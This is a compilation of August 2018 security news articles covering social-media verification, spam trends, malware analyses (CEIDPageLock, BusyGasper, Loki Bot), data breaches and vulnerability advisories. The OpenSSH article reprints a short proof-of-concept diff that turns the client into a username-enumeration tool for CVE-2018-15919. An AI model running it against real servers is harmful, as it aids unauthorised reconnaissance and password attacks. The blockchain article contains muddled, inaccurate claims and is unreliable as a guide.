30.8.2018 securityweek

Instagram this week announced new features to boost account security and provide users with increased visibility into accounts with a large number of followers.

Instagram will soon provide users with the ability to evaluate the authenticity of an account that reaches large audiences. The information will be accessible through an “About This Account” option in the Profile menu, Mike Krieger, Co-Founder & CTO, explains in a blog post.

Information displayed will include the date the account joined Instagram, the country it is located in, accounts with shared followers, username changes in the last year, and details on the ads the account might be running.

The feature appears as a reaction to numerous misinformation campaigns that have been exposed over the past few months, some supposedly originating from Russia or Iran.

“Our community has told us that it’s important to them to have a deeper understanding of accounts that reach many people on Instagram, particularly when those accounts are sharing information related to current events, political or social causes, for example,” Krieger notes.

Starting next month, the social platform will allow people with accounts that reach large audiences to review the information about their accounts. Soon after, the “About This Account” feature will become available to the global community.

Additionally, Instagram is allowing accounts that reach large audiences and meet specific criteria to request verification through a form within the Instagram app. The social platform will review the requests “to confirm the authenticity, uniqueness, completeness and notability of each account,” Krieger says.

The verification request form is available by accessing the menu icon in the Profile section, selecting Settings, and then “Request Verification.” Users requesting verification will need to provide the account username, their full name, and a copy of their legal or business identification.

Instagram will review all requests but might decline verification for some accounts. The verification will be performed free of charge and users won’t be contacted to confirm verification.

Soon, the platform will also include support for third-party authenticator apps for those who choose to use such tools to log into their Instagram accounts.

To take advantage of the feature, users would need to access the profile section, tap the menu icon, go to “Settings,” and then select “Authentication App” in the “Two-Factor Authentication” section. If an authentication app is already installed, Instagram will automatically send a login code to it. Users will need to enter the code on Instagram to enable two-factor authentication.

According to Krieger, support for third-party authenticator apps is already rolling out to users and should reach all of them in the coming weeks.

Lithuanian Media Sign Pact With Govt to Counter Hackers
30.8.2018 securityweek BigBrothers

Lithuania's major online media outlets on Tuesday signed an agreement to work with the defence ministry as they try to fend off a growing barrage of cyber attacks, largely blamed on Russia.

Fears are increasing over possible meddling in elections next year in the Baltic EU and NATO state, where hackers have planted fake news stories on media organizations' websites, or crashed them altogether.

Warning that cyberattacks can sow "great chaos in society and in the state", Defence Minister Raimundas Karoblis said Tuesday that the state felt compelled to cooperate with the media to combat the attacks.

Under the agreement media groups will share information and strategies with government, while press representatives will be able to attend meetings of the National Cyber Security Council.

Lithuania's defence ministry has said attacks are becoming "more and more coordinated, complex and refined", while intelligence services say most of the hostile cyber activity can be traced back to Russia.

The national intelligence agency warned in March that "Russian hackers will likely use cyber tools to influence the upcoming elections in Lithuania in 2019", referring to upcoming presidential, local and European ballots.

Lithuanian online media outlets have crashed on numerous occasions in recent years after being subject to so-called distributed denial of service, or DDoS, attacks.

Last year hackers posted a fake news story on the site of the Baltic News Service (BNS) newswire alleging that a group of US troops in Latvia had been exposed to mustard gas.

Hackers also planted a fake news story about Karoblis coming out as being gay on the news website earlier this year.

Moscow has long objected to Lithuania's drive to join western institutions after it became the first republic to break free from the crumbling Soviet Union in 1990.

The Expected Spike in Post-GDPR Spam Activity Hasn't Happened
30.8.2018 securityweek Privacy

For many months it was expected that privacy protections afforded to consumers by GDPR would also benefit the bad guys. It was feared that security researchers would no longer be able to track new bad domains through WHOIS data, and that spammers would rush to register new domains under new GDPR-enforced anonymity; and that spam would spike once GDPR became effective in May 2018. It hasn't happened.

A new analysis from Recorded Future, combining spam volume data from Cisco's research and domain registrations from its own data sets shows -- if anything -- the reverse to be true. Allan Liska, threat intelligence analyst at Recorded Future, told SecurityWeek, "In the first 90 days since GDPR has been enacted, spam has actually declined, even taking into account the normal seasonal slump that happens during the summer. But it's not just spam volumes," he said, "but there have also been fewer new domains registered in the spammy gTLDs that tend to have a lot of spam."

Post-GDPR Spam Levels

In raw figures, according to Cisco's data, total email at May 1, 2018 stood at 433.9 billion messages, with spam accounting for 85.28% of all email. By August 1, 2018, the total email had fallen to 361.83 billion (probably helped by GDPR's privacy requirements on email marketing) with spam making up 85.14%. Those figures show spam dropping from 370 billion messages in early May (pre-GDPR) to to 308 billion messages in August (post GDPR).

The reason for the drop is not clear. "I don't have a good answer yet," Liska told SecurityWeek. "It may be that the bad guys are sitting back and waiting to see how it all plays out before they decide on their path forward." The last thing they will want to do is register a bunch of domains, "and then everything gets worked out between ICANN and the GDPR -- and the security researchers have full access to that WHOIS data again. So, the beginning groups may be in a wait and see mode."

Another possible cause for the non-appearance of the expected post-GDPR spike in spam is that the spammers don't think anything has really changed. It's true that most registrars have enacted the GDPR restrictions, so WHOIS data is now unavailable. "But there's no slackening in the researchers use of other methodologies to track spam domains," said Liska. "IP tracking, for example: jumping from IP address to IP address through domain algorithms. That type of capability is still being used by the researchers, and researchers are relying more heavily on such techniques."

Possibly arguing in favor of a 'wait and see' approach by the spammers is a corresponding drop in new domain registrations in the more spammy gTLD domains. "Spamhaus keeps track of the top 10 most malicious domains," explained Liska, "and all of the gTLDs saw a strong drop in activity post GDPR. That's a bit unusual and you would think that if nothing's changed from the bad guys' point of view, then they would continue registering these bad domains -- but that doesn't seem to be the case."

The implication of this lack of activity in the spammy gTLDs is that spammers aren't currently planning any major new spam campaigns for the immediate future.

The best possible cause for this dip in spam -- which cannot be fully explained by the summer recess -- is that defenders are finally winning the battle against spam. New techniques and technologies -- especially machine learning algorithms -- are getting better at recognizing and blocking spam. If the spammers aren't making money, they'll move on to something different.

"We've seen a big drop in dot-biz registrations," commented Liska. Dot-biz has long been considered a particularly spammy gTLD, with around 40% of dot-biz domains considered to be spam domains. That still means that 60% of these are genuine, making it impossible to simply block all dot-biz domains. However, with machine learning working to probabilities rather than binary decisions, dot-biz plus a few other lesser flags could rapidly identify and block spam.

Where machine learning is particularly useful, added Liska, is in identifying new phishing and watering hole domains. This would include typosquatting domains and cybersquatting domains. The former would include look-alike spellings and a range of country suffixes that could be mistyped. Liska gave an example of misspelled domains. "Take Wells Fargo," he said. "There are numerous ways that could be misspelled while still looking the same. The letter 'o' could be changed to the numeric zero (Wells Farg0) or the lowercase 'ls' could be changed to uppercase 'Is' (WeIIs Fargo)."

Other examples include registering a well-known brand name in a country-specific domain -- such as dot-cm (Cameroon), dot-co (Columbia), dot-om (Oman) and dot-ne (Nigeria). Each suffix is only a short typo from the major dot-com and dot-net suffixes. Criminals register big brand names in these country domains and wait for people to make a typing mistake to visit their sites.

Cybersquatting domains do not rely on the user making an error while typing the domain, but on appearing to be a genuine company URL. Bad actors will sometimes add a new company tag line or use a new product and register it as a new domain. An example can be seen in the 2017 registration of '' by a resident of Beijing immediately after the Clydesdale Bank introduced its new online cyber foreign exchange service called CYBFX. It wasn't until February 14, 2018 that the UK domain registrar declared it an 'abusive registration' and transferred ownership to Clydesdale Bank.

"There are hundreds of thousands of new domains registered every day," commented Liska. "It's almost impossible for a human to look through all of those domains to find bad things. Machine learning helps us find new registrations that are meant to look like well-known sites."

Does all this mean that the battle against the spammers is being won? "That would be great, but I don't think we can say that yet," he replied. While we can conjecture about why spam and new spam registrations have dipped rather than spiked after GDPR, we will have to wait on the results of the next few 90-day analyses that Recorded Future intends to deliver.

"I've been in this industry for almost 18 years," Liska told SecurityWeek, "and for 18 years we've been fighting spam and losing. I'd love to see that this dip is the beginning of a decline in spam; but my feeling is the bad guys are figuring out how to regroup, and assess the situation. They'll figure out a way round any problems, because that's what they always do. At some point we'll probably see a new uptick in spam volumes again, so we better just enjoy the lull while we have it."

Boston, Mass.-based Recorded Future, founded in 2009, raised $25 million in a Series E funding round led by Insight Venture Partners in October 2017 -- bringing the total funding raised to $57.9 million.

Hacktivist Drama 'Mr. Robot' to End With 4th Season in 2019
30.8.2018 securityweek IT

LOS ANGELES (AP) — The hacktivist thriller "Mr. Robot" is coming to an end.

USA Network said Wednesday the drama series starring Emmy Award-winner Rami Malek will air its fourth and final season in 2019.

In a statement, "Mr. Robot" creator Sam Esmail says he decided that it was time to bring the story to a close next season.

"Mr. Robot" will conclude the way he'd envisioned it since it began, Esmail says.

Malek plays Elliot, a troubled cyber-security engineer and hacker who's drawn into a revolutionary movement.

Christian Slater also stars in the Peabody Award-winning drama.

An air date for the final season of "Mr. Robot" was not announced.

FBI: No Evidence Clinton Server Hacked Despite Trump Tweet
30.8.2018 securityweek

WASHINGTON (AP) — The FBI said Wednesday that it has no evidence Hillary Clinton's private email server was compromised even though President Donald Trump tweeted a news report that alleged the Chinese had hacked it.

Trump tweeted Tuesday evening about a report in the conservative Daily Caller that said a Chinese-owned company operating in the Washington area had hacked the server Clinton had used as secretary of state and obtained nearly all of her emails.

Trump's tweet stated in part: "What are the odds that the FBI and DOJ are right on top of this? Actually, a very big story. Much classified information!"

FBI and Justice Department officials have said publicly that there was no evidence Clinton's server was hacked by a foreign power. Former FBI Director James Comey said at a July 2016 news conference that the FBI did not find direct evidence that the sever had been successfully hacked though he also acknowledged that, "given the nature of the system and of the actors potentially involved," it would have been unlikely for the bureau to find such direct evidence.

A June report from the Justice Department's inspector general on the FBI's handling of the Clinton investigation said FBI specialists did not find evidence that the server had been hacked, with one forensics agent saying he felt "fairly confident that there wasn't an intrusion."

An FBI official said Wednesday after the Daily Caller story and Trump tweet that the "FBI has not found any evidence the servers were compromised."

The White House did not immediately comment on the FBI's statement.

CEIDPageLock Rootkit Hijacks Web Browsers
30.8.2018 securityweek

A new rootkit that has been distributed via the RIG exploit kit over the past few weeks can manipulate web browsers and also contains sophisticated defense mechanisms, Check Point says.

Dubbed CEIDPageLock, the malware was initially discovered a few months ago, when it was attempting to modify the homepage of a victim’s browser. The rootkit is currently attempting to turn the victim browser’s homepage into a site pretending to be a Chinese web directory.

On top of these sophisticated features, the latest versions of the malware monitors user browsing and, when the user attempts to access several popular Chinese websites, it dynamically replaces the content of those sites with the fake home page.

“Browser hijacking employed by malware like CEIDPageLock, can be profitable due to revenue earned via redirecting victims to search engines that share ad revenue with the referrers,” Check Point explained.

The malware’s operators also use a series of hijacking tricks to gather data on the victims’ browsing habits, such as the monitoring of visited sites, which could be used for its own ad campaigns or sold to other companies.

A dropper is used during infection, to extract a digitally signed 32-bit kernel-mode driver. The certificate was issued by Thawte but has been already revoked. After registering and starting the driver, the dropper sends the infected machine’s MAC address and user-id.

The driver is launched during startup and remains fairly stealthy, being able to evade antivirus solutions. It was designed to connect to one of two command and control (C&C) domains hardcoded in it and to download a homepage configuration to tamper the browser with.

The newer version of the malware is also packed with VMProtect, thus making analysis and unpacking difficult, especially since it is also a kernel mode driver, Check Point notes.

The iteration also includes a “redirection” capability, to send victims to the fake homepage whenever they attempt to access targeted sites. The rootkit also checks every outgoing HTTP message for specific strings and adds the process to the redirected list when a string is encountered.

The malware also blocks browsers from accessing a series of anti-virus’ files and includes the ability to create registry key in a security product.

The vast majority of CEIDPageLock’s targets are located in China, with only a negligible number of infections outside the country, Check Point says.

“At first glance, writing a rootkit that functions as a browser hijacker and employing sophisticated protections such as VMProtect, might seem like overkill. However, it seems that this simple malicious technique can be very profitable and thus the attackers believe that it is worthwhile to invest in building a stealthy and persistent tool for it,” the security firm notes.

Furthermore, the malware has the ability to execute code on an infected device. Coupled with the fact that it operates from the kernel and its persistence mechanism, CEIDPageLock is “a potentially perfect backdoor,” Check Point concludes.

China Probes Suspected Customer Data Leak at Accor Partner
30.8.2018 securityweek Incindent

Shanghai police said they were investigating a suspected data leak at NASDAQ-listed Chinese hotelier Huazhu Group, the local partner of France-based AccorHotels.

Huazhu, one of China’s biggest hoteliers, released a statement on Tuesday saying it had alerted police to reports that the company's internal data was being sold online, asking them to investigate.

Chinese media reports said the data included guest membership information, personal IDs, check-in records, guest names, mobile numbers, and emails.

Police in Shanghai said in a statement that they were looking into the case.

Huazhu's website said it operates more than 3,000 hotels in more than 370 cities in China, including the AccorHotels brands Ibis and Mercure.

Shanghai-based Huazhu formed a long-term alliance with Accor in 2014 to help the French hotel group develop the Chinese market.

Huazhu said the release of the data had caused a "vicious impact", without giving specifics, and that it was conducting an internal investigation.

The sale of personal information is common in China, which last year implemented a controversial cybersecurity law that requires services to store user data in China and receive approval from users before sharing their details.

Chinese e-commerce giant Alibaba came under fire earlier this year over its handling of user data in an episode that underscores growing concerns for privacy in the hyper-digitised country.

Alibaba's online-payments affiliate Ant Financial was forced to apologise after users said they felt misled into allowing its Alipay service to share data on their spending habits with Ant's credit-scoring arm and other third-party services.

Advanced Android Spyware Remained Hidden for Two Years
30.8.2018 securityweek Android

A newly detailed Android spyware that has an incredibly wide-ranging protocol has been active since May 2016, Kaspersky Lab warns.

Dubbed BusyGasper, the malware includes device sensors listeners (such as motion detectors), can exfiltrate data from messaging applications (WhatsApp, Viber, Facebook), includes keylogging capabilities, and supports 100 commands.

Featuring a multicomponent architecture, the malware can download payloads and updates from the command and control (C&C) server, an FTP server belonging to the free Russian web hosting service Ucoz.

The spyware also includes support for the IRC protocol and can “can log in to the attacker’s email inbox, parse emails in a special folder for commands and save any payloads to a device from email attachments,” Kaspersky’s security researchers reveal.

The malware is apparently being installed manually, likely through physical access to a compromised device. Thus, fewer than 10 victims have been identified to date, all of them located in Russia.

The attackers collected victims’ personal data, including messages from IM applications, and SMS banking messages, yet the actor doesn’t appear interested in stealing the victims’ money.

“We found no similarities to commercial spyware products or to other known spyware variants, which suggests BusyGasper is self-developed and used by a single threat actor. At the same time, the lack of encryption, use of a public FTP server and the low opsec level could indicate that less skilled attackers are behind the malware,” Kaspersky says.

An initial module installed on the targeted device can be controlled over the IRC protocol and allows operators to deploy additional components. The module apparently has root privileges, yet the researchers found no evidence of an exploit being used to obtain such rights.

The first module can start/stop IRC, manipulate IRC settings, exit, use root features, report when the screen is on, hide/unhide the implant icon, execute shell, send commands to the second module, download and copy component to the system path, and write specified message to log.

The second module writes a log of the command execution history to a file named “lock,” which can be exfiltrated to the C&C server. Log messages can also be sent via SMS to the attacker’s number.

“The malware has its own command syntax that represents a combination of characters while the “#” symbol is a delimiter,” Kaspersky explains.

Featuring all of the capabilities found in modern spyware, the threat can spy on all available device sensors and can log registered events, can enable GPS/network tracking, and can execute multiple initial commands if an incoming SMS contains a specific string.

BusyGasper’s kelogging capabilities have been implemented in an original manner, Kaspersky says. The malware creates a textView element hidden from the user, then adds onTouchListener to it, to process every user tap. The listener only processes coordinates, which it matches with hardcoded ones.

A hidden menu that provides control of implant features appears to have been created for manual operator control. The menu is activated if the operator calls the hardcoded number “9909” from the infected device.

A full list of commands supported by the malware shows that it can capture photos, record audio and video, execute specified shell commands, monitor and exfiltrate messages, update itself, and perform various backdoor commands.

Loki Bot Attacks Target Corporate Mailboxes
30.8.2018 securityweek BotNet

Loki Bot’s operators have been targeting corporate mailboxes with their spam messages, Kaspersky Lab reports.

The emails employ various lures to trick potential victims into opening malicious attachments that would deploy the Loki Bot stealer onto the target machines. The messages masquerade as notifications from other companies, or as orders and offers.

As part of the campaign, cybercriminals have been targeting corporate mailboxes that can be obtained from public sources or which are listed on the targeted companies’ websites, Kaspersky discovered.

The spam messages would attempt to deliver the malicious payload via an attached ISO file. The extension is associated with copies of optical discs that can be mounted to access their content. Modern operating systems can mount ISO files directly, but dedicated software that can handle the extension also exists.

ISO files represent complete images of optical discs, and cybercriminals are now abusing them as containers for delivering their malicious applications, it seems. Such occurrences, however, are rare, Kaspersky says.

As part of the recent campaign, the ISO files contained the Loki Bot malware, an information-stealing Trojan designed to harvest usernames and passwords from the victim machines, along with other user data.

“The malware’s key objective is to steal passwords from browsers, messaging applications, mail and FTP clients, and cryptocurrency wallets. Loki Bot dispatches all its loot to the malware owners,” Kaspersky notes.

The new campaign proves yet again that the security measures organizations take should also include training for employees, in addition to technical protection. Employees’ actions can cause irreparable damage to a business, the security firm notes.

“Every year we observe an increase in spam attacks on the corporate sector. The perpetrators have used phishing and malicious spam, including forged business emails, in their pursuit of confidential corporate information: intellectual property, authentication data, databases, bank accounts, etc,” Kaspersky concludes.

4-year old Misfortune Cookie vulnerability threatens Capsule Technologies medical gateway device
30.8.2018 securityaffairs Incindent

The Misfortune Cookie flaw is threatening medical equipment that connects bedside devices to the hospital’s network infrastructure.
In December 2104, researchers at Check Point Software Technologies discovered the Misfortune Cookie vulnerability, a flaw that was affecting millions of devices running an embedded web server called RomPager, the vulnerability could be exploited by an attacker to run a man-in-the-middle attack on traffic going to and from home routers from every manufacturer.

An attacker that is able to compromise a vulnerable device like a home router could use it as an entry point in a target network and hack other devices.

Four years later, the Misfortune Cookie vulnerability is still threatening devices worldwide, in particular, medical equipment that connects bedside devices to the hospital’s network infrastructure.

Researchers from security firm CyberMDX discovered that flawed versions of RomPager (4.01 through 4.34 ) ran on different variants of Capsule Datacatptor Terminal Server (DTS) included in medical device information system.

The gateway device connects bedside equipment (anesthesia and infusion pumps, respirators and IoT products) to the network.

“CyberMDX discovered a previously undocumented vulnerability in the device, noting that Qualcomm Life’s Capsule Datacaptor Terminal Server (a medical device gateway) is exposed to the “misfortune cookie” CVE-2014-9222. This opens the possibility for remote arbitrary memory write, which can lead to unauthorized login and code execution.” reads the security advisory published by the company.

Experts warn that modifying the configuration of the Capsule Datacaptor Terminal Server directly influences the connectivity of the medical device. The attacker can exploit the flaw to steal the patient’s sensitive information.

“Altering the availability and/or configuration of the Capsule Datacaptor Terminal Server directly influences the connectivity of the medical device and allows spoofing communication to and/or from the medical device. In other words — when patient’s sensitive information is sent from a medical device it can be leaked and spoofed by an attacker in this situation.” continues the report.

The bad news is that an exploit code for this flaw is available online.

Misfortune Cookie

The US ICS-CERT issued an alert for the vulnerability, the flaw tracked as CVE-2014-9222 received a severity score of 9.8 out of 10

“This vulnerability allows an attacker to send a specially crafted HTTP cookie to the web management portal to write arbitrary data to the device memory, which may allow remote code execution,” states the ICS-CERT.

Qualcomm Life Capsule Technologies has released a security patch to address the vulnerability, but it only works for the Single Board variant of the DTS, from 2009, instead, it is not possible to use it on The Dual Board, Capsule Digi Connect ES and Capsule Digi Connect ES converted to DTS.

Administrators of the products that cannot be updated should disable the embedded server as mitigation, the webserver, in fact, is only utilized for configuration during the initial deployment and is not necessary for remote support of the device.

NCCIC recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Below the recomendations included in the ICS-CERT alert:

Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.
Locate control system networks and remote devices behind firewalls, and isolate them from the business network.
When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

Data of 130 Million hotel chain guests offered for 8 BTC on Dark Web
30.8.2018 securityaffairs Incindent

A hacker is offering for sale the personal details of over 130 million hotel chain guests on a Chinese Dark Web forum.
The news was reported by Bleeping computers, a hacker is selling the personal details of over 130 million hotel guests for 8 Bitcoin on a Chinese Dark Web forum.

“The breach was reported today by Chinese media after several cyber-security firms spotted the forum ad [1, 2, 3, 4].” states Bleeping Computer.

The price for the huge trove of data is 8 Bitcoin (roughly $49,000), it includes official website registration information (ID card number, mobile phone number, email address, login password); check-in registration information (customer name, ID card number, home address, birthday), and booking information (name, card number, mobile phone number, check-in time, departure time, hotel ID number, room number).

The offer was noticed by several cyber-security firms, the hacker claims to have obtained the data from Huazhu Hotels Group Ltd, one of biggest Chinese hotel chains that operate 13 hotel brands across 5,162 hotels in 1,119 Chinese cities.

The stolen data appears to be related to guests who stayed at any of Huazhu’s hotel brands (Hanting Hotel, Grand Mercure, Joye, Manxin, Novotel, Mercure, CitiGo, Orange, All Season, Starway, Ibis, Elan, Haiyou).

The ad published by the seller states the stolen data is included in an archive of 141.5 GB that contains 240 million records, with information on roughly 130 million hotel guests that stayed at one of Huazhu hotels.

Chinese hotel chain dark web

On August 28th, the China Lodging Group issued a statement on the Weibo platform announcing that the group has launched an internal investigation, the Chinese hotel chain also reported the incident to the authorities.

According to the Chinese cyber-security firm Zibao data are authentic and the incident likely occurred early August.

Zibao experts believe the data are related to a new is data leak and are not collected from previous data breaches, instead, it appears to be linked to a mistake of a Huazhu’s programmer that uploaded it on GitHub.

“Zibao Technology believes that this batch of data is suspected to be leaked by a Chinese-speaking company programmer who uploaded to GitHub 20 days ago using a database connection.” reads

CVE-2018-15919 username enumeration flaw affects OpenSSH Versions Since 2011
30.8.2018 securityaffairs

Qualys experts discovered that OpenSSH is still vulnerable to Oracle attack, it is affected by the CVE-2018-15919 flaw at least since September 2011.
Security experts from Qualys discovered that OpenSSH is still vulnerable to Oracle attack, it is affected by the CVE-2018-15919 flaw at least since September 2011.

A few days ago the security expert Darek Tytko from has reported a similar username enumeration vulnerability in the OpenSSH client. The flaw tracked as CVE-2018-15473 affects all versions of the software that was released since 1999. The vulnerability could be exploited by a remote attacker to guess the usernames registered on an OpenSSH server.

Researchers from Qualys discovered that another username enumeration vulnerability affects the latest version of OpenSSH, the issue was tracked as CVE-2018-15919.

Qualys researchers discovered the vulnerability while analyzing a commit in the OpenBSD source code.

“While properly reviewing the now-famous OpenSSH commit we discovered another username-enumeration vulnerability in auth2-gss.c (enabled by default on at least Fedora, CentOS, and Red Hat Enterprise Linux).” reads the security advisory.

“This vulnerability affects OpenSSH versions from 5.9 (September 6, 2011) to the recently released 7.8 (August 24, 2018), inclusive. It is quite similar to CVE-2018-15473 (it is not a timing attack), but it is also markedly different (code excerpts from OpenSSH 7.8p1)”

The issue resides in the auth2-gss.c module that is enabled by default on many Linux distros, including CentOS, Fedora, and Red Hat Enterprise Linux.

When a user tries to authenticate, an attacker receives the same packet whether the user is valid or not as explained in the report.

“if the user is valid, then “server_caused_failure” is set, “failures” is not incremented, and the attacker can attempt the GSSAPI authentication indefinitely;
if the user is invalid, then “server_caused_failure” is not set, “failures” is incremented (at line 412), and the server will disconnect the attacker (at line 417) after max_authtries authentication attempts (6, by default).”
If the user is valid, then ‘server_caused_failure’ is set,” this is not true when the user that does not exist.

Experts explained that the number of attempts for an invalid user is limited to six, while if a valid user is provided the attacker can attempt the GSSAPI authentication indefinitely.

The latter case allows the attacker to run brute-force attacks on the password.

Experts published the following proof-of-concept code for the CVE-2018-15919 flaw:

diff -pruN openssh-7.8p1/gss-genr.c openssh-7.8p1-poc/gss-genr.c
--- openssh-7.8p1/gss-genr.c 2018-08-22 22:41:42.000000000 -0700
+++ openssh-7.8p1-poc/gss-genr.c 2018-08-22 22:41:42.000000000 -0700
@@ -286,6 +286,7 @@ ssh_gssapi_check_mechanism(Gssctxt **ctx

ssh_gssapi_set_oid(*ctx, oid);
+ return 1;
major = ssh_gssapi_import_name(*ctx, host);
if (!GSS_ERROR(major)) {
major = ssh_gssapi_init_ctx(*ctx, 0, GSS_C_NO_BUFFER, &token,
diff -pruN openssh-7.8p1/sshconnect2.c openssh-7.8p1-poc/sshconnect2.c
--- openssh-7.8p1/sshconnect2.c 2018-08-22 22:41:42.000000000 -0700
+++ openssh-7.8p1-poc/sshconnect2.c 2018-08-22 22:41:42.000000000 -0700
@@ -701,6 +701,7 @@ userauth_gssapi(Authctxt *authctxt)
ssh_dispatch_set(ssh, SSH2_MSG_USERAUTH_GSSAPI_TOKEN, &input_gssapi_token);
ssh_dispatch_set(ssh, SSH2_MSG_USERAUTH_GSSAPI_ERROR, &input_gssapi_error);
ssh_dispatch_set(ssh, SSH2_MSG_USERAUTH_GSSAPI_ERRTOK, &input_gssapi_errtok);
+ return 1;

mech++; /* Move along to next candidate */

According to the experts from Qualys, the OpenSSH maintainers do not consider the username enumeration vulnerability as critical and for this reason, it hasn’t planned a fix in a short time.

“Open-source developer Damien Miller working on OpenSSH says that system libraries do not treat this type of information disclosure as a threat because usernames are considered the non-secret part of user identity, useless to an attacker without the accompanying password.” states Bleeping Computer.

“Specific users on a system can often give away the exact operating system or distribution, as well as services that are running on the system, especially if they have default usernames for those services,” Jimmy Graham, Director of Product Management at Qualys. told BleepingComputer.

What the Blockchain Taught Us about IT Security
30.8.2018 securityaffairs IT

It is not just about security, but in utilizing Blockchain to secure your company and your information.
With how fast technology is improving and being included in everyday activities or jobs to make them fast and efficient, it is important to make sure you are secured, especially when on the internet. You can have your own internet security installed, but if you are planning on running a reliable business you will need a strong and trusted company to provide secure IT systems and support. But it is not just about security, but in utilizing Blockchains to secure your company and your information.


What Does IT Stand For?

IT stands for Information Technology and it is basically all the technological advances we have made as a society. At first, IT was slow to start and no one believed that it would go far. But with how much IT has helped and made things easier for people, it is not a wonder why it has become a need for social progress. IT helps the American economy create new products, find the full potential in their employees, participate in global events and company offers, and even manage their own companies.

Without the improvement or advances of IT, we as a society would not be the high functioning one that we are now. But no matter how advanced our technology becomes, IT is ever the more prone of being abused and used to access private and sensitive information. That is why it is vital to have some sort of protection on the company’s system. It cannot be just any simple protection, it has to be a strong form of protection in order to protect the vital and important information. That is where blockchains come in.

What is a Blockchain?
Blockchains can be hard to understand, especially if you do not know many technological terms. Blockchains were originally used as a type of online currency, such as Bitcoin, the original blockchain. But as of recent, large scale companies are starting to use blockchains as a type of database that stores, shares, and maintains data across other businesses. There are different types of databases that blockchains can create and maintain and it is up to the company to decide on which ones work for them. They types of Blockchains are:

Public Blockchains
Blockchain-Inspired Cryptocurrencies
Private Blockchains
Public blockchains are openly available to the public and anyone with a computer can go on, see the data, and update it without needing any special permissions.

Blockchain-Inspired cryptocurrencies record ledgers that anyone can access, but it does need some connection to a business or company.

Private blockchains are secure and personal and are only meant to be shared among a certain group of computers and are not available for the public to access.

Each type of blockchain has its own benefits and security levels, so it is up to the company to decide just how secure they want their information to be.

What Type of Blockchain Technologies are there?
There are five types of blockchain technologies that you should look out for if you are considering adding blockchain technology to your business or company.

Smart Contracts
Energy Efficiency
Permissioned blockchains
Smart contracts do exactly as you direct them to based on an input of coded instructions. They are reliable if you require certain business actions to be completed at certain times in a specific way.

Blockchains-as-a-Service offers everything businesses need in order to start a blockchain in case the businesses are unable to start one themselves.

Energy efficiency tries to reduce the amount of energy needed in order to create and maintain blockchains by operating on a recycled or proof-of-work energy cycle.

Permissioned blockchains are used mainly by banks and governments to provide control over who can make transactions and who can create changes.

Tangle is a blockchain without being a blockchain. It takes all of the advances blockchains have and tries to improve on the limitations.

It is a lot of information to take in, especially when first starting out on trying to use blockchains. But it can become relatively simple with the right help and understanding of how blockchains can be an ideal form of security on the web.

How are Blockchains Helping in Online Security?
Blockchains and crypto currencies are rising in usage more and more each year with every technological advance. As businesses start to rely more on technology and online use, they have to be careful to make sure that they are safe and their information does not fall into the wrong hands. Blockchains work to make businesses and companies feel secure about storing their information online to make it easier to access and be used by others within the company. Blockchains work to create strong, impregnable walls that are hard to break through without the proper permissions.

Is this a Worthwhile Job?
Companies should invest in learning how to use blockchains or to train others in the skill since it seems like blockchains will be in high demand within the next year or so. It is still a relatively new concept, so while it is still starting out companies will be looking for the best blockchain engineers. The great thing about learning the blockchain skill is how versatile it is. Almost every type of company could use and benefit from the security blockchains offer. It has the potential to change lives just like the internet originally did when it first came out.

Blockchains are still a new concept that not everyone has heard about or fully understand the potential that it has. It will take some time for companies to start using blockchains instead of their previous security systems, but the change is expected to happen in around a year. You can be assured that blockchains will soon become normality when it comes to online security. It is best to start researching on blockchains, what they can be used for, and what you can do to make the transition easier.

Air Canada data breach – 20,000 users of its mobile app affected
30.8.2018 securityaffairs Incindent

Air Canada data breach – The incident was confirmed by the company and may have affected 20,000 customers (1%) of its 1.7 million mobile app users.
The data breach of the day is the one suffered by Air Canada that may have affected 20,000 customers (1%) of its 1.7 million mobile app users.

The news was confirmed by Air Canada that revealed to have detected unusual login behaviour with Air Canada’s mobile App between Aug. 22-24, 2018, it added that financial data was protected but invited to remain vigilant for fraudulent credit card transactions.

“We detected unusual login behaviour with Air Canada’s mobile App between Aug. 22-24, 2018. We immediately took action to block these attempts and implemented additional protocols to protect against further unauthorized attempts. As an additional security precaution, we have locked all Air Canada mobile App accounts to protect our customers’ data.” reads the data breach notification.

“Your credit card information is protected. Credit cards that are saved to your profile are encrypted and stored in compliance with security standards set by the payment card industry or PCI standards. As a best practice, customers should always monitor their transactions and credit rating carefully and contact their financial services provider immediately if they become aware of any unusual or unauthorized activities.”

The company has asked Mobile+ app users to reset their accounts as a security precaution. Air Canada contacted potentially affected customers by email to notify the data breach.

Air Canada immediately took action to lock out unauthorized attempts and implemented additional security measures to protect its mobile users.

The most disconcerting aspect of the Air Canada data breach is that attackers may gave accessed additional data including customer’s passport number, passport expiration date, passport country of issuance and country of residence, Aeroplan number, known traveler number, NEXUS number, gender, date of birth, and nationality.

All this data could have been saved in their profile section of the Air Canada mobile app.
air canada data breach

At the time it is still unclear the root cause of the Air Canada data breach, the company urges users to reset their passwords.

All 1.7 million accounts have been temporarily locked until the customers change their passwords.

Twitter Suspends Accounts Engaged in Manipulation
29.8.2018 securityweek

Twitter this week announced the suspension of a total of 770 accounts for “engaging in coordinated manipulation.”

The suspensions were performed in two waves. One last week, when the social networking platform purged 284 accounts, many of which supposedly originated from Iran, and another this week, when 486 more accounts were kicked for the same reason.

“As with prior investigations, we are committed to engaging with other companies and relevant law enforcement entities. Our goal is to assist investigations into these activities and where possible, we will provide the public with transparency and context on our efforts,” Twitter noted last week.

The micro-blogging platform took action on the accounts after FireEye published a report detailing a large campaign conducted out of Iran focused on influencing the opinions of people in the United States and other countries around the world.

Active since at least 2017, the campaign focuses on anti-Israel, anti-Saudi, and pro-Palestine topics, but also included the distribution of stories regarding U.S. policies favorable to Iran, such as the Joint Comprehensive Plan of Action nuclear deal.

The report triggered reactions from large Internet companies, including Facebook and Google. The former removed 652 pages, groups, and accounts suspected of being tied to Russia and Iran, while the latter blocked 39 YouTube channels and disabled six Blogger and 13 Google+ accounts.

“Since our initial suspensions last Tuesday, we have continued our investigation, further building our understanding of these networks. In addition, we suspended an additional 486 accounts for violating the policies outlined last week. This brings the total suspended to 770,” Twitter said on Tuesday.

The social platform also revealed that fewer than 100 of the 770 suspended accounts claimed to be located in the United States, and many were sharing divisive social commentary. These accounts, however, had thousands of followers, on average.

